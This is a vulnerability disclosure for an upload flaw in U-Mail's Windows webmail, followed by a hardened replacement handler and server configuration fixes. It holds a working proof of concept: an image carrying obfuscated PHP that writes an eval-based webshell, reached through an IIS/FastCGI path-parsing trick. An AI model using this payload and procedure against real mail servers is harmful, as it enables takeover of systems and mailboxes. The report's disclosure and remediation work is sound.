### Summary:
The Windows build of the U-Mail mail system has a flaw that lets an ordinary (non-admin) user get a shell (getshell).
### Details:
Environment: the latest Windows build downloaded from the official site, deployed on Windows Server 2003 + IIS 6; the mailbox was accessed with the latest Chrome browser. A login as a regular user is required.
Vulnerable file:
C:\umail\WorldClient\html\client\option\module\o_letterpaper.php
Code:
```php
if ( ACTION == "letterpaper-img-upload" )
{
    $targetFolder = getusercachepath( );
    // Token check: because of the || below, any request that carries a file
    // (non-empty $_FILES) skips the token comparison entirely
    $verifyToken = md5( "unique_salt".$_POST['timestamp'] );
    if ( !empty( $_FILES ) || $_POST['token'] == $verifyToken )
    {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        $targetPath = $targetFolder;
        // The client-supplied file name is used verbatim in the destination path
        $targetFile = rtrim( $targetPath, "/" )."/letterpaper_".$_FILES['Filedata']['name'];
        $fileTypes = array( "jpg", "jpeg", "gif", "png" );
        $fileParts = pathinfo( $_FILES['Filedata']['name'] );
        // The only type check: the final extension must be in the whitelist
        if ( in_array( $fileParts['extension'], $fileTypes ) )
        {
            $handle = opendir( $targetPath );
            while ( ( $file = readdir( $handle ) ) !== FALSE )
            {
                // As written this condition can never be true ($file cannot equal
                // both "." and ".."), so the cleanup below never runs
                if ( !( $file != "." ) && !( $file != ".." ) && strpos( $file, "letterpaper_" ) === FALSE )
                {
                    $dir = rtrim( $targetPath, "/" ).DIRECTORY_SEPARATOR.$file;
                    unlink( $dir );
                }
            }
            closedir( $handle );
            if ( move_uploaded_file( $tempFile, $targetFile ) )
            {
                $thumbFile = rtrim( $targetPath, "/" )."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension'];
                $thumbUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension'];
                $targetUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$_FILES['Filedata']['name'];
                // Thumbnail generation must succeed, so the upload has to be a decodable
                // image; otherwise the file is removed again (see the else branch)
                if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) )
                {
                    // The response discloses the stored path and URL of the upload
                    dump_json( array(
                        "status" => 1,
                        "file" => $targetFile,
                        "fileUrl" => $targetUrl,
                        "thumb" => $thumbFile,
                        "thumbUrl" => $thumbUrl
                    ) );
                }
                else
                {
                    unlink( $targetFile );
                    exit( );
                }
            }
        }
        else
        {
            dump_json( array( "status" => 0, "msg" => "Invalid file type." ) );
        }
    }
}
```
This is the image upload page for letter paper (stationery); only image formats such as jpg are allowed. Since this is the Windows build, it can be combined with the IIS 6.0 parsing vulnerability, but uploading a file named `a.php;a.jpg` produced an error (script execution error, HTTP 500). PHP here runs as FastCGI, so the `v.jpg/a.php` parsing vulnerability is used instead. The PHP version shipped in the default install package is:
![d5d1e8a2-1150-47f6-a1c2-33a076b14409.png](https://images.seebug.org/upload/201405/1618505037818a71917c121c3e782bf5e8f4ca52.png)
Exploitation process
Prepare an image trojan. It must be a real image, and the PHP code embedded in it is:
```php
<?php @fwrite(fopen(base64_decode('ZnVjay5waHA='),w), base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydmdWNrJ10pOz8+'));
```
Note: do not close the tag, or it will error. Once the code executes, a one-line shell named fuck.php is created in the current directory.
The image trojan used here is:
![ddd.jpg](https://images.seebug.org/upload/201405/161851365da85b5aaa472acf4075f022851fe663.jpg)
If the file is not a real image trojan, the call to
```php
if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) )
```
fails, and the response will not contain the address of the uploaded file, as shown:
![abfe8804-34c4-4705-8ecf-df0a7f3d2e87.png](https://images.seebug.org/upload/201405/1618521634479267f85d9c167f8ec6ebf64b7d72.png)
After logging into the mailbox in Chrome, set up a proxy:
![a4c5dae0-0077-4668-8d5a-a60beb2633f5.png](https://images.seebug.org/upload/201405/16185256a2d2c24943561902f768f938b5b7881c.png)
View the response:
![dd.png](https://images.seebug.org/upload/201405/161853348e42c5326241a26dc8ae3c9a656c592e.png)
The address returned for the uploaded file is:
/webmail/client/cache/5/letterpaper_v.jpg
OK, now open //webmail/client/cache/5/letterpaper_v.jpg/a.php in the browser:
![bb.png](https://images.seebug.org/upload/201405/1618540971e3bd0b39ed67cce2f3f561c1296b57.png)
The official site does not expose the letter-paper settings feature, but the same request can still be submitted locally with the POST address modified to obtain a webshell; this was not tested in detail.
The official site itself has the parsing vulnerability, as shown:
![dw.png](https://images.seebug.org/upload/201405/161854522fa128e8087eb14cd907e7d619959a21.png)
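The handler above has three weaknesses the report relies on: the file name and its extension come straight from the client, the only content check is that a thumbnail can be generated (which a valid image with PHP code in its metadata passes), and the stored path is echoed back. The following hardened handler is an added example and is not U-Mail's code; it assumes PHP 7 or later with the GD and fileinfo extensions, and the names `store_letterpaper_upload` and `$targetFolder` are my own. It derives the type from the file content, re-encodes the pixel data so metadata segments are dropped, and stores the file under a server-generated name so no client string ever reaches the path.

```php
<?php
// Hardened replacement for the letterpaper upload handler (added example, not U-Mail code).
// Assumes: PHP >= 7.0, GD + fileinfo loaded, and $targetFolder is a per-user cache
// directory from which the web server is configured not to execute scripts.
function store_letterpaper_upload(array $upload, string $targetFolder): array
{
    // 1. Only accept a genuine PHP upload that completed without error.
    if (!isset($upload['tmp_name'], $upload['error']) || $upload['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        return ['status' => 0, 'msg' => 'Upload failed.'];
    }

    // 2. Decide the type from content, never from the client-supplied name.
    //    getimagesize() parses the image header; finfo cross-checks the MIME type.
    $allowed = [
        IMAGETYPE_JPEG => ['ext' => 'jpg', 'mime' => 'image/jpeg'],
        IMAGETYPE_PNG  => ['ext' => 'png', 'mime' => 'image/png'],
        IMAGETYPE_GIF  => ['ext' => 'gif', 'mime' => 'image/gif'],
    ];
    $info = @getimagesize($upload['tmp_name']);
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($upload['tmp_name']);
    if ($info === false || !isset($allowed[$info[2]]) || $allowed[$info[2]]['mime'] !== $mime) {
        return ['status' => 0, 'msg' => 'Invalid file type.'];
    }
    $ext = $allowed[$info[2]]['ext'];

    // 3. Re-encode through GD. Only pixel data is written back, so EXIF/comment
    //    segments (where embedded script tags normally live) do not survive.
    //    This reduces risk but is not the decisive control; step 4 and the server
    //    configuration are.
    $img = @imagecreatefromstring(file_get_contents($upload['tmp_name']));
    if ($img === false) {
        return ['status' => 0, 'msg' => 'Invalid image data.'];
    }

    // 4. Server-chosen file name: names such as "v.jpg/a.php" or "a.php;a.jpg"
    //    cannot occur because no client-controlled string enters the path.
    $name = 'letterpaper_' . bin2hex(random_bytes(16)) . '.' . $ext;
    $targetFile = rtrim($targetFolder, '/\\') . DIRECTORY_SEPARATOR . $name;

    switch ($ext) {
        case 'jpg': $ok = imagejpeg($img, $targetFile, 90); break;
        case 'png': $ok = imagepng($img, $targetFile);      break;
        default:    $ok = imagegif($img, $targetFile);      break;
    }
    imagedestroy($img);
    if (!$ok) {
        return ['status' => 0, 'msg' => 'Could not write image.'];
    }

    // 5. Return only what the client needs; the on-disk path stays private.
    return ['status' => 1, 'name' => $name];
}

// Usage inside the ACTION branch (hypothetical call, mirroring the original handler):
// dump_json(store_letterpaper_upload($_FILES['Filedata'], getusercachepath()));
```

Two server-side settings complement the code: set `cgi.fix_pathinfo = 0` in php.ini so a request for `letterpaper_v.jpg/a.php` is not resolved to the image as a script, and configure the handler mapping for the cache directory so that no script engine runs there at all. The token check should also become an `&&` condition (token required regardless of `$_FILES`), which the original `||` does not enforce.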
### Proof of Vulnerability:
See the detailed description above.